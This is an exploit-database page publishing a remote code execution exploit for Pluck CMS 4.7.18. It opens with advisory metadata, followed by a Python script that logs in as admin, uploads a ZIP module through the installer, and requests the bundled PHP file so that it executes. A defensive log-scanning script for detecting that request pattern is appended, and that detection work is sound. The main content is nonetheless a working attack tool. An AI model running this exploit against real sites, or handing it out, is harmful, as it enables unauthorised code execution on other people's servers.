Pluck v4.7.18 Remote Code Execution (RCE)

2023.07.15
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

#Exploit Title: Pluck v4.7.18 - Remote Code Execution (RCE)
#Application: pluck
#Version: 4.7.18
#Bugs: RCE
#Technology: PHP
#Vendor URL: https://github.com/pluck-cms/pluck
#Software Link: https://github.com/pluck-cms/pluck
#Date of found: 10-07-2023
#Author: Mirabbas Ağalarov
#Tested on: Linux

import requests
from requests_toolbelt.multipart.encoder import MultipartEncoder

login_url = "http://localhost/pluck/login.php"
upload_url = "http://localhost/pluck/admin.php?action=installmodule"
headers = {"Referer": login_url,}
login_payload = {"cont1": "admin","bogus": "","submit": "Log in"}

file_path = input("ZIP file path: ")

# Module archive sent as the "sendfile" field of the install-module form
multipart_data = MultipartEncoder(
    fields={
        "sendfile": ("mirabbas.zip", open(file_path, "rb"), "application/zip"),
        "submit": "Upload"
    }
)

# Authenticated admin session is required for the module installer
session = requests.Session()
login_response = session.post(login_url, headers=headers, data=login_payload)

if login_response.status_code == 200:
    print("Login account")

    upload_headers = {
        "Referer": upload_url,
        "Content-Type": multipart_data.content_type
    }
    upload_response = session.post(upload_url, headers=upload_headers, data=multipart_data)

    if upload_response.status_code == 200:
        print("ZIP file download.")
    else:
        print("ZIP file download error. Response code:", upload_response.status_code)
else:
    print("Login problem. response code:", login_response.status_code)

# PHP file from the uploaded archive, requested directly under data/modules/
rce_url="http://localhost/pluck/data/modules/mirabbas/miri.php"
rce=requests.get(rce_url)
print(rce.text)
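A defender-side check for the request sequence in the script above, as an added example that is not part of the original advisory: it scans web access logs for a POST to `admin.php?action=installmodule` and for direct requests to PHP files under `data/modules/`. The function name, the combined log format, and the sample log lines are assumptions constructed for illustration, as is the premise that direct requests to module PHP files are unusual on your install.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Combined-log-format fields needed: client, method, request target, status.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')
# Direct request for a PHP file inside an installed module directory.
MODULE_PHP_RE = re.compile(r'/data/modules/([^/]+)/.*\.php$', re.I)

def find_module_php_hits(lines):
    """Return (client, module, path, same_client_installed) for every
    successful direct request to a PHP file under data/modules/.
    The last field is True when that client POSTed to the module
    installer earlier in the log."""
    installers = set()  # clients seen submitting the install-module form
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the assumed format
        client, method, target, status = m.groups()
        url = urlsplit(target)
        action = parse_qs(url.query).get("action", [""])[0]
        if (method == "POST" and url.path.endswith("/admin.php")
                and action == "installmodule"):
            installers.add(client)
            continue
        hit = MODULE_PHP_RE.search(url.path)
        if hit and status == "200":
            findings.append((client, hit.group(1), url.path,
                             client in installers))
    return findings

# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [15/Jul/2023:10:00:01 +0000] "POST /pluck/login.php HTTP/1.1" 200 512',
    '203.0.113.7 - - [15/Jul/2023:10:00:02 +0000] "POST /pluck/admin.php?action=installmodule HTTP/1.1" 200 2048',
    '203.0.113.7 - - [15/Jul/2023:10:00:03 +0000] "GET /pluck/data/modules/mirabbas/miri.php HTTP/1.1" 200 64',
    '198.51.100.9 - - [15/Jul/2023:10:05:00 +0000] "GET /pluck/index.php?file=home HTTP/1.1" 200 4096',
]

if __name__ == "__main__":
    for finding in find_module_php_hits(SAMPLE_LOG):
        print(finding)
```

Findings with the last field set to True show an upload and a direct hit from the same client; findings with False are still worth reviewing, since the module may have been installed from another address.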


Copyright 2024, cxsecurity.com